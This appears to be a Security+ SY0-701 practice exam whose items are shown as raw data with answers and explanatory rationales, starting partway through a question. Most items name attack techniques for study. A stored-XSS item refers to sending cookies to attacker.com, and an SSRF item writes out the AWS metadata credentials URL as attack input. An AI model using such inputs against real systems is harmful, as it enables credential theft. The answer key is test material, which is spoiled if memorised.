A full diagnostic practice test modeled on the real Security+ SY0-701 — same four content categories, same proportions. Find out exactly where you stand before test day.
40
Questions
4
Categories
150m
Real Exam Time
~150
Target Score
How this works
Answer every question — you can navigate freely and change answers before submitting.
You will not see correct answers during the test, just like the real exam.
After you submit, you get a scaled-style score, a pass/no-pass read, and a category-by-category diagnostic showing where you're ready and where you need work.
Every question is then revealed with the correct answer and a full rationale.
Enable the 300-minute timer for realistic pacing practice (optional — you can keep going if it runs out)
This is where the real value is — see exactly which domains are ready and which need work before test day.
. The site displays the review without sanitization on the product page. What is the consequence?",
options:["The attacker's machine is exposed to attack","Anyone viewing the product page sends their session cookie to attacker.com (stored XSS)","The site's database is destroyed","The product page becomes unavailable"],
correct:1,
rationale:"This is stored (persistent) XSS. The malicious script is stored in the database with the review and executed by every visitor's browser when the page is rendered, exfiltrating session cookies. The attacker can then hijack their sessions. The attacker's machine is the receiver, not the target. The database is not destroyed. The page remains available — that is what makes the attack work."
},
{
cat:"D2",
q:"During an investigation, a SOC analyst finds a workstation making periodic outbound connections to a known malicious IP address. The IP address is an example of what?",
options:["A vulnerability","An exploit","An indicator of compromise (IoC)","A threat actor"],
correct:2,
rationale:"An indicator of compromise (IoC) is observable evidence that a system has been or is being compromised — known-bad IPs, malware file hashes, suspicious filenames, C2 domains. A vulnerability is a weakness. An exploit is a technique that takes advantage of a vulnerability. A threat actor is the human or group behind the activity."
},
{
cat:"D2",
q:"An attacker on the same network as a user intercepts the user's HTTPS connection to a banking site and forces the client and server to negotiate down to TLS 1.0 with a weak cipher suite. What type of attack is this?",
options:["Birthday attack","Collision attack","Downgrade attack","Replay attack"],
correct:2,
rationale:"A downgrade attack forces the use of an older, weaker protocol or cipher than what both parties support — often by tampering with the negotiation handshake (POODLE exploited SSL 3.0 downgrade). A birthday attack exploits hash collisions probabilistically. A collision attack finds two inputs that hash to the same value. A replay attack captures and re-sends a valid message. Modern TLS protections include TLS_FALLBACK_SCSV."
},
{
cat:"D2",
q:"An attacker on a public Wi-Fi network uses ARP spoofing to associate their MAC address with the gateway's IP. All traffic from victim devices is now relayed through the attacker's machine. Which attack class is this?",
options:["Phishing","On-path (formerly man-in-the-middle)","SQL injection","Buffer overflow"],
correct:1,
rationale:"On-path (the modern term for man-in-the-middle, MITM) attacks position the attacker between two communicating parties so traffic can be observed or modified. ARP spoofing on a local network is one classic way to achieve on-path positioning. Phishing tricks users. SQL injection attacks web-app data layers. Buffer overflow is a memory-safety vulnerability."
},
{
cat:"D2",
q:"An attacker sets up a rogue access point in an airport named 'Airport_Free_WiFi' that mimics the legitimate airport WiFi. Travelers connect to it and the attacker captures their traffic. What is this attack?",
options:["War driving","Bluesnarfing","Evil twin","RFID skimming"],
correct:2,
rationale:"An evil twin is a rogue wireless access point set up to impersonate a legitimate one, tricking users into connecting and exposing their traffic. War driving is the practice of searching for and mapping wireless networks while driving. Bluesnarfing is unauthorized access via Bluetooth. RFID skimming captures contactless-card data."
},
{
cat:"D2",
q:"An attacker tries thousands of passwords per second against a single user account until one works. What attack is this, and what is the simplest mitigation?",
options:["Credential stuffing — MFA","Brute force — account lockout after N failed attempts","Phishing — security awareness training","Rainbow table attack — strong password hashing"],
correct:1,
rationale:"A brute-force attack iterates through possible passwords against a single account. The simplest, most effective server-side mitigation is account lockout after a small number of failed attempts (e.g., 5), which dramatically slows the attacker. Credential stuffing reuses leaked username/password pairs. Phishing is a different attack class. Rainbow tables attack stored hash dumps offline, mitigated by salting."
},
{
cat:"D2",
q:"An attacker gains access to a non-privileged user account on a Linux server. They then exploit a kernel vulnerability to become root. What is this technique called?",
options:["Lateral movement","Vertical privilege escalation","Horizontal privilege escalation","Persistence"],
correct:1,
rationale:"Vertical privilege escalation is gaining higher rights than originally granted (user → root). Horizontal privilege escalation is taking over another account at the same level (user A → user B's data). Lateral movement is moving from one host to another. Persistence is establishing mechanisms to maintain access across reboots."
},
{
cat:"D2",
q:"A web application checks whether a user has permission to access a file, then opens the file. An attacker exploits the tiny window between the check and the open to swap the file with a symlink to /etc/shadow. What class of vulnerability is this?",
options:["Buffer overflow","Time-of-check to time-of-use (TOCTOU) race condition","Integer overflow","SQL injection"],
correct:1,
rationale:"TOCTOU is a race-condition vulnerability where a security check is separated in time from the action it authorizes, allowing an attacker to alter the state between the two. Mitigations include atomic operations (open then check via file descriptor) and avoiding TOCTOU patterns entirely. Buffer overflow corrupts memory boundaries. Integer overflow exploits arithmetic. SQL injection targets unsanitized SQL."
},
{
cat:"D2",
q:"An open-source npm package used by thousands of applications is compromised when an attacker gains access to the maintainer's account and pushes a malicious update. Applications that auto-update pull in the malicious version. What category of attack is this?",
options:["Insider threat","Supply chain attack","Distributed denial of service","Phishing"],
correct:1,
rationale:"A supply chain attack compromises a trusted upstream dependency to reach many downstream targets at once. SolarWinds, Codecov, and various npm package compromises are famous examples. An insider threat is from a trusted user of the targeted organization. DDoS overwhelms availability. Phishing tricks users directly."
},
{
cat:"D2",
q:"An attacker successfully exploits a stack buffer overflow in a C program. The program has DEP (NX bit) enabled but does NOT have ASLR. Which exploitation technique is MOST likely to succeed?",
options:["Direct shellcode injection in the buffer","Return-oriented programming (ROP) using gadgets at known addresses","Format string attack","SQL injection"],
correct:1,
rationale:"DEP (Data Execution Prevention, the NX bit) prevents the stack from being executed as code, defeating naive shellcode injection. ROP chains together short snippets of existing executable code (gadgets) in the program's text segment. ROP requires knowing where those gadgets are — without ASLR, the addresses are static and predictable, making ROP highly reliable. (A) is blocked by DEP. (C) and (D) are separate classes."
},
{
cat:"D2",
q:"An employee uses a badge to open a secured door at the company entrance. A stranger they do not know walks in behind them before the door closes. What is this called?",
options:["Piggybacking / tailgating","Shoulder surfing","Dumpster diving","Pharming"],
correct:0,
rationale:"Tailgating (also called piggybacking) is unauthorized entry to a secured area by following an authorized person through the door. Mitigations include mantraps, employee training to challenge unknown followers, and turnstile-style entries. Shoulder surfing is observing someone's screen or keystrokes. Dumpster diving is searching trash for sensitive information. Pharming is DNS redirection."
},
{
cat:"D2",
q:"Which of the following BEST describes the difference between a vulnerability scan and a penetration test?",
options:["They are the same thing","A vulnerability scan identifies potential weaknesses; a penetration test attempts to exploit them to demonstrate impact","A penetration test is automated; a vulnerability scan is manual","A vulnerability scan is always destructive; a penetration test is always safe"],
correct:1,
rationale:"A vulnerability scan uses automated tooling to identify known weaknesses (missing patches, weak configs, default creds) — broad and shallow. A penetration test goes further: it attempts actual exploitation, chains vulnerabilities, and demonstrates real-world impact — narrow and deep. (C) is backwards. (D) is also backwards — pentests CAN be destructive; scans are usually non-disruptive."
},
{
cat:"D2",
q:"A web application accepts a URL from the user and fetches that URL server-side to display a preview. An attacker submits http://169.254.169.254/latest/meta-data/iam/security-credentials/ — the AWS instance metadata URL. What attack is this, and what does the attacker gain?",
options:["SSRF — access to the cloud instance's IAM credentials","XSS — the attacker's script runs in other users' browsers","CSRF — the attacker makes the server perform an action on the user's behalf","Directory traversal — the attacker reads arbitrary local files"],
correct:0,
rationale:"Server-Side Request Forgery (SSRF) tricks the server into making a request to an unintended destination, often internal or cloud-only addresses. AWS's metadata service at 169.254.169.254 returns IAM role credentials accessible only from within the instance — an SSRF that reaches it can extract credentials and pivot to the cloud account. IMDSv2 (token-based) is the standard mitigation. (B), (C), and (D) describe different attack classes."
},
{
cat:"D2",
q:"An attacker successfully injects a forged DNS record for 'bank.com' into a recursive DNS resolver's cache. All clients that query this resolver for bank.com now resolve to the attacker's IP. What is this attack, and what protocol mitigates it?",
options:["DNS amplification — rate limiting","DNS cache poisoning — DNSSEC","ARP poisoning — DAI (Dynamic ARP Inspection)","BGP hijack — RPKI"],
correct:1,
rationale:"DNS cache poisoning injects forged answers into a resolver's cache, redirecting users to attacker-controlled destinations. DNSSEC cryptographically signs DNS records, allowing resolvers to verify authenticity and reject forged answers. DNS amplification is a different attack (used for DDoS). ARP poisoning and BGP hijack are real attacks with real mitigations but are not what this scenario describes."
},
{
cat:"D2",
q:"A hospital still runs a critical patient-monitoring application that requires Windows Server 2008, which the vendor no longer supports. What is the GREATEST security risk?",
options:["The hospital cannot get a refund","New vulnerabilities discovered after end-of-life will not be patched, creating permanent exposure","The software will stop working entirely","Insurance premiums will rise"],
correct:1,
rationale:"End-of-life (EOL) software no longer receives security updates from the vendor. New vulnerabilities discovered after EOL remain exploitable indefinitely on that system. Compensating controls (network segmentation, application allow-listing, strict monitoring) may be necessary if the system cannot be replaced. (A), (C), and (D) are not the greatest security risk."
},
{
cat:"D2",
q:"PERFORMANCE-BASED: Match each attack technique to the MOST effective primary mitigation. Attacks: (1) SQL injection, (2) Cross-site scripting, (3) CSRF, (4) Buffer overflow in C, (5) Phishing. Mitigations: (A) Anti-CSRF tokens on state-changing requests, (B) Parameterized queries, (C) Bounded copy functions plus ASLR plus DEP, (D) Output encoding plus Content Security Policy, (E) User awareness training plus email filtering plus DMARC. What is the correct mapping?",
options:["1-A, 2-B, 3-C, 4-D, 5-E","1-B, 2-D, 3-A, 4-C, 5-E","1-C, 2-A, 3-D, 4-B, 5-E","1-B, 2-A, 3-D, 4-C, 5-E"],
correct:1,
rationale:"Each pairing matches root-cause to the mitigation. SQL injection roots in unparameterized query construction — parameterized queries are the canonical fix (1-B). XSS roots in untrusted data rendered as HTML — output encoding plus CSP defends (2-D). CSRF roots in trusted cookies auto-sent on cross-site requests — anti-CSRF tokens break the trust automation (3-A). Buffer overflows root in unbounded memory operations — bounded copies plus runtime hardening (4-C). Phishing roots in human deception — training plus filtering plus DMARC (5-E)."
},
{
cat:"D3",
q:"A hospital has a network with patient-monitoring devices (medical IoT), an electronic health record (EHR) system, and public Wi-Fi for visitors. What is the BEST network design?",
options:["One flat /16 network for ease of management","Three VLANs with no inter-VLAN routing","Three segmented zones with firewall rules controlling necessary inter-zone traffic","Place visitor Wi-Fi on the same VLAN as the EHR system to simplify ACLs"],
correct:2,
rationale:"Hospital networks classically separate clinical (EHR), medical-device (IoT), and visitor zones with firewall-controlled inter-zone traffic. The EHR may need to receive vitals data from monitors via a controlled, audited path, but visitor Wi-Fi should never have a path to either. A flat network provides no isolation — unacceptable for HIPAA-regulated data. Three VLANs with no routing would prevent monitors from feeding EHR. Option D is dangerous on its face."
},
{
cat:"D3",
q:"An organization needs to encrypt 5 TB of data at rest on a database server. Which combination of algorithm and mode is MOST appropriate?",
options:["RSA-2048 for the full dataset","AES-256 in ECB mode","AES-256 in GCM mode","SHA-256"],
correct:2,
rationale:"AES-256 is a symmetric algorithm appropriate for bulk data encryption. GCM mode provides both confidentiality AND authenticated encryption (built-in integrity check). RSA is asymmetric and computationally impractical for multi-terabyte datasets; it is used for key exchange. ECB mode reveals patterns in plaintext and is broken for structured data. SHA-256 is a hash function — integrity, not encryption."
},
{
cat:"D3",
q:"An organization is moving its email system to a SaaS provider (Microsoft 365). Under the shared responsibility model, who is responsible for managing user account permissions and configuring conditional-access policies?",
options:["The SaaS provider only","The customer only","Shared equally between customer and provider","Neither — these are handled by the underlying IaaS layer"],
correct:1,
rationale:"In a SaaS model the provider manages the application, infrastructure, OS, and physical security. The customer always retains responsibility for IDENTITY, ACCESS MANAGEMENT, and DATA — including who has accounts and what conditional-access policies are enforced. The provider does not configure your users for you. (C) misstates the SaaS model. (D) is wrong — IaaS is a different model."
},
{
cat:"D3",
q:"An employee working from a coffee shop needs to securely access internal company file shares. Which technology is MOST appropriate?",
options:["A site-to-site VPN","A remote-access (client) VPN","A web proxy","RDP exposed to the public internet"],
correct:1,
rationale:"A remote-access VPN authenticates an individual user's device to the corporate network and encrypts the tunnel between them, providing access to internal resources as if the user were on the corporate LAN. A site-to-site VPN connects two NETWORKS. A web proxy routes web traffic but does not provide access to file shares. RDP exposed to the public internet is a major security risk."
},
{
cat:"D3",
q:"A startup wants to run a Linux server in the cloud without managing any underlying hardware, but they want full control over the OS and software stack. Which cloud service model is this?",
options:["IaaS (Infrastructure as a Service)","PaaS (Platform as a Service)","SaaS (Software as a Service)","FaaS (Function as a Service)"],
correct:0,
rationale:"IaaS gives the customer virtual machines (or containers) with full control of the OS and software stack. The provider manages the physical hardware, virtualization layer, and networking. PaaS abstracts the OS — the customer just deploys their code. SaaS delivers a complete application. FaaS runs individual functions on demand with no persistent server."
},
{
cat:"D3",
q:"Which of the following BEST describes the security difference between a Type 1 and Type 2 hypervisor?",
options:["Type 1 runs on bare metal; Type 2 runs on a host OS, generally with a larger attack surface","Type 1 runs on a host OS; Type 2 runs on bare metal","There is no security difference","Type 2 is more secure because it has more abstraction layers"],
correct:0,
rationale:"Type 1 hypervisors (Xen, ESXi, Hyper-V) run directly on bare metal. Type 2 hypervisors (VirtualBox, VMware Workstation) run on top of a host operating system. Type 2 inherits the host OS attack surface (every kernel vulnerability is also a hypervisor vulnerability), so Type 1 is generally more appropriate for production isolation. (B) reverses the definitions. (C) and (D) are incorrect."
},
{
cat:"D3",
q:"An attacker who has compromised a guest VM exploits a vulnerability in the hypervisor to gain code execution on the host system, allowing them to access other guest VMs. What is this attack called?",
options:["VM sprawl","VM escape","Containerization breakout","Hyperjacking"],
correct:1,
rationale:"VM escape is when an attacker in a guest VM exploits a hypervisor vulnerability to break out into the host system, potentially compromising every other guest on the same host. Famous examples include CVE-2017-4903 (VMware) and various Xen vulnerabilities. VM sprawl is the operational problem of too many unmanaged VMs. Container breakout is the analogous concept for containers, not VMs. Hyperjacking is hijacking the hypervisor itself via an installed rootkit."
},
{
cat:"D3",
q:"Which statement BEST captures the security difference between containers (e.g., Docker) and virtual machines?",
options:["Containers share the host OS kernel; VMs have their own kernels — so a container escape is generally more impactful than a VM escape from a defense-in-depth perspective","Containers and VMs have identical security properties","VMs share the host kernel; containers do not","Containers are always more secure than VMs"],
correct:0,
rationale:"Containers share the host operating system kernel; VMs run their own complete OS. Because containers share the kernel, a kernel-level escape from a container reaches the host directly — there is less isolation between container and host than between VM and host. This does not mean containers are insecure, but it changes the threat model. (C) reverses the architectures. (D) is too absolute."
},
{
cat:"D3",
q:"A company runs a public-facing web server and an internal database server. Where should the web server be placed in the network?",
options:["On the internal LAN with the database","In a DMZ (screened subnet) with restricted inbound and outbound firewall rules","Directly on the internet with no firewall","On the same VLAN as employee workstations"],
correct:1,
rationale:"A DMZ (also called a screened subnet) is a network segment for systems that must be reachable from the public internet but should be isolated from internal systems. Firewall rules restrict what the DMZ host can reach inbound and outbound, so a compromise of the web server does not immediately expose internal databases. (A), (C), and (D) all collapse the isolation that is the point of having a DMZ."
},
{
cat:"D3",
q:"An organization decomposes a monolithic application into 40 microservices, each communicating over HTTPS. What is the GREATEST new security consideration this introduces?",
options:["The application runs slower","Service-to-service authentication and authorization (often via mTLS or service mesh) becomes critical at a scale that did not exist before","The code is harder to write","The hosting cost increases"],
correct:1,
rationale:"Microservices multiply the number of trust boundaries within the application. Service-to-service authentication and authorization — often implemented via mTLS (mutual TLS) or a service mesh like Istio/Linkerd — becomes mandatory; assuming an internal-network is enough is the classic mistake. Performance, code complexity, and cost are real concerns but not the GREATEST SECURITY consideration."
},
{
cat:"D3",
q:"An organization deploys a serverless function (AWS Lambda, Azure Functions) that processes user uploads. Which security consideration is MOST DIFFERENT from a traditional server deployment?",
options:["There is no need to think about security in serverless","The customer no longer patches the OS, but IAM-permission tightness on the function becomes the dominant security control","Serverless is immune to injection attacks","Serverless functions cannot be exploited"],
correct:1,
rationale:"In serverless, the cloud provider manages the OS, the runtime, and physical security. The customer's primary security responsibility shifts to the IAM role attached to the function (over-permissive IAM is the #1 serverless mistake), input validation, and dependency hygiene. Injection attacks still apply at the application code level. (A), (C), (D) are dangerous misconceptions."
},
{
cat:"D3",
q:"A Zero Trust Architecture implementation requires that every access decision incorporate which of the following inputs?",
options:["Only the user's username and password","User identity, device posture/health, request context (location, time), and resource sensitivity — combined into a per-request policy decision","Only the source IP address of the request","Only whether the user is on the corporate network"],
correct:1,
rationale:"Zero Trust evaluates every request against rich context: who is asking (verified identity, often with MFA), what device they are on (managed, patched, compliant), where and when the request comes from, and how sensitive the requested resource is. Decisions are per-request, not per-session. Source IP alone or network location alone is exactly the implicit-trust model Zero Trust is designed to replace."
},
{
cat:"D3",
q:"An analyst is reviewing data classification labels. Which set BEST describes the three states data can exist in for security planning purposes?",
options:["Hot, warm, cold","Encrypted, hashed, plaintext","At rest, in transit, in use","Backup, primary, archive"],
correct:2,
rationale:"Data exists in three states: at rest (stored on disk or other persistent media), in transit (moving across a network), and in use (loaded in active memory or being processed). Each state has its own protection requirements — disk encryption for at rest, TLS for in transit, confidential computing or memory protection for in use. (A) describes data storage tiers. (B) describes transformations. (D) describes backup tiers."
},
{
cat:"D3",
q:"A company encrypts all data on its hard drives using BitLocker. An attacker steals a powered-off laptop. What security property does BitLocker provide in this scenario?",
options:["Confidentiality of data at rest","Confidentiality of data in transit","Authentication of the user","Non-repudiation of file modifications"],
correct:0,
rationale:"Full-disk encryption like BitLocker protects data at rest — when the device is powered off, the data on disk is encrypted and inaccessible without the decryption key (which is typically protected by the TPM, a PIN, or both). It does not protect data in transit, authenticate the user (login mechanisms do that), or provide non-repudiation. Once the device is unlocked and running, the data is decrypted in memory and FDE no longer applies."
},
{
cat:"D3",
q:"A retailer wants to store credit card numbers in a form that allows them to perform transactions but never stores the actual PAN. What technique BEST achieves this?",
options:["Hashing the PAN with SHA-256","Tokenization — replacing the PAN with a token that maps to it in a secure vault","Encrypting the PAN with AES","Masking the PAN (showing only the last 4 digits)"],
correct:1,
rationale:"Tokenization replaces a sensitive value (PAN) with a non-sensitive token; the mapping is held in a separate, hardened vault. Applications work with tokens; only the vault sees the real PAN. This dramatically shrinks PCI DSS scope. Hashing is one-way — cannot be used for transactions. Encryption is reversible but requires key management at every system that needs the real value. Masking only hides display; the underlying value is still stored."
},
{
cat:"D3",
q:"Why are password hashes 'salted' before storage?",
options:["To make the hash function run faster","To defeat precomputed rainbow tables by making identical passwords produce different hashes","To compress the hash to a smaller size","To encrypt the password reversibly"],
correct:1,
rationale:"A salt is a unique random value added to each password before hashing. It defeats rainbow tables (precomputed hash dictionaries) because the attacker would need a separate table per salt, which is computationally infeasible. It also ensures two users with the same password have different stored hashes. Salting does not speed up the hash, compress it, or make it reversible."
},
{
cat:"D3",
q:"An organization wants to process highly sensitive data in a cloud VM such that even the cloud provider's privileged operators cannot read the data in memory. Which technology is MOST appropriate?",
options:["Full-disk encryption","Confidential computing using Trusted Execution Environments (TEEs) like Intel SGX or AMD SEV","VLAN segmentation","Standard TLS"],
correct:1,
rationale:"Confidential computing protects data IN USE — in memory — by running workloads inside a hardware-isolated Trusted Execution Environment (TEE) such as Intel SGX, AMD SEV, or AWS Nitro Enclaves. The cloud provider's hypervisor and operators cannot read the memory inside the TEE. Full-disk encryption protects at rest. TLS protects in transit. VLANs segment network traffic, not memory."
},
{
cat:"D3",
q:"An organization manages its cloud infrastructure with Terraform. Someone manually changes a security group rule directly in the AWS console. The Terraform state no longer matches reality. What is this condition called, and what is the security risk?",
options:["Configuration drift — undocumented changes evade review and can introduce vulnerabilities or break re-deployments","Immutable infrastructure — there is no security risk","Blue-green deployment — improves security","Canary release — no risk"],
correct:0,
rationale:"Configuration drift occurs when the actual state of infrastructure diverges from the declared (IaC) state. The security risk: changes evade the code review and change-management process, can introduce vulnerabilities, and any subsequent terraform apply may either revert the manual fix or fail unpredictably. Mitigations include alerting on drift, disabling console write access, and treating IaC as the only source of truth."
},
{
cat:"D3",
q:"A water utility runs ICS/SCADA systems that control pumps and valves. What is the MOST important architectural principle for protecting these systems?",
options:["Run the same antivirus on ICS endpoints as on office laptops","Strict network segmentation isolating OT from IT, with controlled and monitored crossing points (data diodes, jump hosts)","Expose ICS systems directly to the internet for remote management","Disable all monitoring to reduce attack surface"],
correct:1,
rationale:"ICS/SCADA networks (operational technology) have different threat models from corporate IT: real-time constraints, legacy protocols, decade-long device lifespans. The most important principle is strict segmentation between OT and IT networks (the Purdue model formalizes this), with controlled crossings via data diodes (one-way), jump hosts, and dedicated monitoring. Office AV may not run on OT devices. Direct internet exposure is catastrophic. Removing monitoring removes defense, not attack surface."
},
{
cat:"D3",
q:"An organization issues laptops and phones to all employees. They need to enforce that all devices have full-disk encryption, current OS patches, and screen-lock policies — and to remotely wipe lost devices. What technology category is this?",
options:["EDR (Endpoint Detection and Response)","MDM (Mobile Device Management) / UEM (Unified Endpoint Management)","SIEM (Security Information and Event Management)","DLP (Data Loss Prevention)"],
correct:1,
rationale:"MDM/UEM platforms (Jamf, Intune, Workspace ONE) push policy configuration, monitor compliance, and provide remote wipe for corporate-managed devices. EDR detects and responds to active threats on endpoints. SIEM centralizes logs for analysis. DLP prevents sensitive data from leaving the organization. The scenario describes device-policy enforcement, which is the MDM/UEM use case."
},
{
cat:"D3",
q:"PERFORMANCE-BASED: An organization is deploying a new public-facing 3-tier web application. The tiers are (1) presentation/web, (2) application/API, (3) database. Which network architecture BEST follows defense in depth?",
options:["All three tiers on a single flat network reachable from the internet","Web tier in a DMZ; app tier in a private subnet reachable only from web tier; database tier in a private subnet reachable only from app tier; firewall rules enforce the chain","Web tier private; app tier in DMZ; database tier on the internet","All tiers on the internet for ease of debugging"],
correct:1,
rationale:"The defensible 3-tier pattern places the web tier in a DMZ (reachable from internet on 443 only), the app tier in a private subnet reachable ONLY from the web tier (not directly internet-reachable), and the database in a deeper private subnet reachable ONLY from the app tier. Firewall rules between subnets enforce the chain. Each tier compromise still requires defeating the next tier's controls. (A), (C), (D) all break the isolation that makes the pattern defensible."
},
{
cat:"D3",
q:"PERFORMANCE-BASED: Match each cloud service model to who is responsible for OS patching. Models: (1) IaaS, (2) PaaS, (3) SaaS. Responsible parties: (A) Cloud provider, (B) Customer.",
options:["1-A, 2-A, 3-A","1-B, 2-A, 3-A","1-A, 2-B, 3-B","1-B, 2-B, 3-B"],
correct:1,
rationale:"In IaaS the customer rents VMs and is responsible for the OS — patching is customer responsibility. In PaaS the provider manages the OS and runtime; the customer just deploys code. In SaaS the provider manages everything including OS. Therefore: IaaS = customer patches, PaaS = provider patches, SaaS = provider patches. The cloud shared-responsibility model formalizes this split per service model — knowing it cold is required for the exam."
},
{
cat:"D4",
q:"A vulnerability scanner reports a critical CVE on a production web server that the vendor has patched. What is the FIRST step in remediating this vulnerability?",
options:["Apply the patch immediately to production","Test the patch in a non-production environment","Disable the affected service permanently","Schedule the patch for the next quarterly maintenance window"],
correct:1,
rationale:"First step is always to test in a non-production environment to verify the patch does not break dependent applications. Applying directly to production risks outages. Disabling the service may be a compensating control but is not the FIRST step. Waiting for a quarterly window is unacceptable for a critical CVE on a production-facing server."
},
{
cat:"D4",
q:"A SIEM correlates the following events for a single user account within 10 minutes: a failed login from Atlanta, a successful login from Atlanta, a successful login from Mumbai. Which of the following BEST describes this pattern?",
options:["Brute force attack","Impossible travel","Privilege escalation","Watering hole attack"],
correct:1,
rationale:"Impossible travel detects logins from geographically distant locations within a time window that physical travel cannot account for (Atlanta to Mumbai in 10 minutes). It strongly suggests credential compromise. Brute force would show many failed attempts. Privilege escalation is gaining higher access rights, not a geographic indicator. Watering hole is attacker compromise of a website frequented by the target."
},
{
cat:"D4",
q:"During the LESSONS LEARNED phase of an incident response, which of the following is the MOST important output?",
options:["A list of compromised systems","Updated playbooks and detection rules based on what was missed","A criminal-prosecution-ready evidence chain","A press release for media communications"],
correct:1,
rationale:"Lessons learned produces actionable improvements — updated detection rules, runbook changes, control-gap fixes — so the same or similar incident is caught faster next time. The list of compromised systems comes from identification/analysis. The criminal-evidence chain is built during containment and eradication if law enforcement is involved. A press release is part of communications during the incident."
},
{
cat:"D4",
q:"A workstation is suspected of being compromised. A forensic responder needs to collect evidence. According to the order of volatility, which type of data should be collected FIRST?",
options:["Hard drive contents","Running memory (RAM)","Network share files","Archived backup tapes"],
correct:1,
rationale:"Order of volatility dictates that more volatile data — data lost soonest if not captured — must be collected first. RAM disappears when power is cut, so it is collected before any non-volatile media. Hard drive contents persist after power-off and are next. Network share files and backup tapes are persistent and lowest priority in volatility ordering."
},
{
cat:"D4",
q:"An organization requires users to enter a password AND a code from a hardware token. Which of the following BEST describes this authentication?",
options:["Single-factor authentication using two passwords","Two-factor authentication using something you know and something you have","Two-factor authentication using something you know and somewhere you are","Three-factor authentication"],
correct:1,
rationale:"Password = something you know. Hardware token = something you have. Two distinct factor TYPES = two-factor authentication. (A) is wrong because a password and a token code are not both passwords. (C) is wrong because location is not part of the scenario. (D) is wrong — only two factor types are in play."
},
{
cat:"D4",
q:"A company's web server is running an unpatched version of Apache with a known remote-code-execution vulnerability. What does the unpatched Apache represent?",
options:["A threat","A vulnerability","A risk","An exploit"],
correct:1,
rationale:"A vulnerability is a weakness in a system that could be exploited — unpatched software with a known flaw is exactly that. A threat is the agent that might exploit the vulnerability. A risk is the combination of likelihood and impact. An exploit is the actual code or technique used to take advantage of a vulnerability."
},
{
cat:"D4",
q:"Which access control model assigns permissions based on the user's job role (e.g., 'accountant', 'engineer', 'admin')?",
options:["Discretionary Access Control (DAC)","Mandatory Access Control (MAC)","Role-Based Access Control (RBAC)","Rule-Based Access Control"],
correct:2,
rationale:"RBAC assigns permissions to roles, then assigns users to roles — making access management scalable in enterprises. DAC lets the resource owner choose who can access (file-system permissions on most consumer OSes). MAC uses system-enforced classifications and clearances (military/government). Rule-Based Access Control uses general rules (often time-based or location-based) applied universally, independent of identity."
},
{
cat:"D4",
q:"An organization wants to grant users elevated permissions only at the moment they need them, and automatically revoke those permissions after a short time window. What is this approach called?",
options:["Just-in-time (JIT) access","Standing privilege","Role-based access","Discretionary access"],
correct:0,
rationale:"Just-in-time (JIT) access grants elevated permissions only for the duration of an approved task, eliminating standing privilege as an attack surface. PAM (Privileged Access Management) platforms implement JIT alongside session recording, credential vaulting, and break-glass access. Standing privilege is the opposite — permanent elevated rights. RBAC and DAC are access models, not granting strategies."
},
{
cat:"D4",
q:"An organization uses SAML to federate authentication between its identity provider and multiple SaaS applications. What is the PRIMARY security benefit of this architecture?",
options:["Users have a separate password for every SaaS application","User credentials are managed centrally; offboarding instantly revokes access to all federated apps","Each SaaS application stores its own copy of the password","MFA is automatically disabled"],
correct:1,
rationale:"Federated identity (SAML, OIDC) centralizes credential management at the IdP. Disabling a user in the IdP terminates access to every federated application at once — the classic offboarding nightmare of dozens of orphaned accounts is solved. Centralized MFA, audit, and conditional access are also benefits. (A), (C), and (D) describe the opposite of what federation provides."
},
{
cat:"D4",
q:"Modern NIST password guidance (SP 800-63B) explicitly discourages which of the following long-standing practices?",
options:["Using a password manager","Forced periodic password rotation without evidence of compromise","Using passphrases of 15+ characters","Checking new passwords against breach corpus lists"],
correct:1,
rationale:"NIST SP 800-63B (revised) discourages mandatory periodic rotation because it pushes users toward weak, predictable patterns (Password1, Password2, Password3...). Rotation should be triggered by evidence of compromise. The same guidance encourages password managers, long passphrases, and checking against known-breached lists. The shift away from forced rotation is one of the most commonly tested updates on recent SY0-7xx exams."
},
{
cat:"D4",
q:"Which authentication factor type is a fingerprint scan?",
options:["Something you know","Something you have","Something you are","Somewhere you are"],
correct:2,
rationale:"Biometric factors (fingerprint, face, iris, voice) are 'something you are' — based on a physical or behavioral trait. 'Something you know' is a password or PIN. 'Something you have' is a token, smart card, or phone. 'Somewhere you are' is a location-based factor (geofencing, source IP). MFA strength comes from combining factors of DIFFERENT types, not multiples of the same type."
},
{
cat:"D4",
q:"When evaluating a biometric authentication system, which metric BEST captures the system's overall accuracy by representing the point at which the False Acceptance Rate and False Rejection Rate are equal?",
options:["False Acceptance Rate (FAR) alone","False Rejection Rate (FRR) alone","Crossover Error Rate (CER)","Failure to Enroll Rate (FER)"],
correct:2,
rationale:"The Crossover Error Rate (CER), also called Equal Error Rate (EER), is the operating point where FAR equals FRR. A lower CER means a more accurate system overall. FAR alone tells you how often imposters are wrongly accepted. FRR alone tells you how often legitimate users are wrongly rejected. Tuning a system makes one go up as the other goes down; CER is the single comparable accuracy number."
},
{
cat:"D4",
q:"A company implements separation of duties so that the person who initiates a wire transfer cannot also approve it. What threat does this primarily mitigate?",
options:["External denial of service","Insider fraud and unilateral action","SQL injection","Ransomware encryption"],
correct:1,
rationale:"Separation of duties splits a sensitive activity across multiple people so no single individual can complete it alone. It defeats insider fraud and reduces the impact of a single compromised account. It does not prevent external technical attacks (DoS, SQL injection, ransomware) — those are addressed by other controls. SoD is a procedural control, often paired with PAM for technical enforcement."
},
{
cat:"D4",
q:"Which email authentication protocol allows a domain owner to publish a policy stating how receiving servers should treat messages that fail SPF and DKIM checks?",
options:["SPF","DKIM","DMARC","BIMI"],
correct:2,
rationale:"DMARC (Domain-based Message Authentication, Reporting, and Conformance) builds on SPF and DKIM. The domain owner publishes a DMARC record stating the policy (none, quarantine, reject) for messages that fail SPF/DKIM alignment, plus reporting addresses. SPF authorizes sending IPs. DKIM signs messages cryptographically. BIMI displays a verified brand logo in supporting mail clients but does not set enforcement policy."
},
{
cat:"D4",
q:"An organization wants to allow only a curated list of approved applications to run on employee laptops; all other executables are blocked. What is this approach called, and what is its primary security benefit?",
options:["Application blocklisting — flexibility","Application allowlisting (whitelisting) — defaults to deny, dramatically reducing malware execution surface","EDR — detection after execution","Anti-spyware scanning"],
correct:1,
rationale:"Application allowlisting (formerly whitelisting) approves a specific set of executables and denies everything else by default. The security benefit is huge: unknown executables (including most malware) simply cannot run, even if delivered. Application blocklisting attempts the opposite (block known-bad, allow everything else) and is less effective because new malware is constantly created. EDR is reactive. Anti-spyware is signature-based detection."
},
{
cat:"D4",
q:"A SIEM aggregates logs from firewalls, endpoints, identity providers, and applications. What primary value does this aggregation provide that the source systems do not?",
options:["Each source system already does this","Cross-source correlation — patterns that span systems (impossible travel, lateral movement, kill-chain progression) become detectable","Lower storage cost","Faster log writes"],
correct:1,
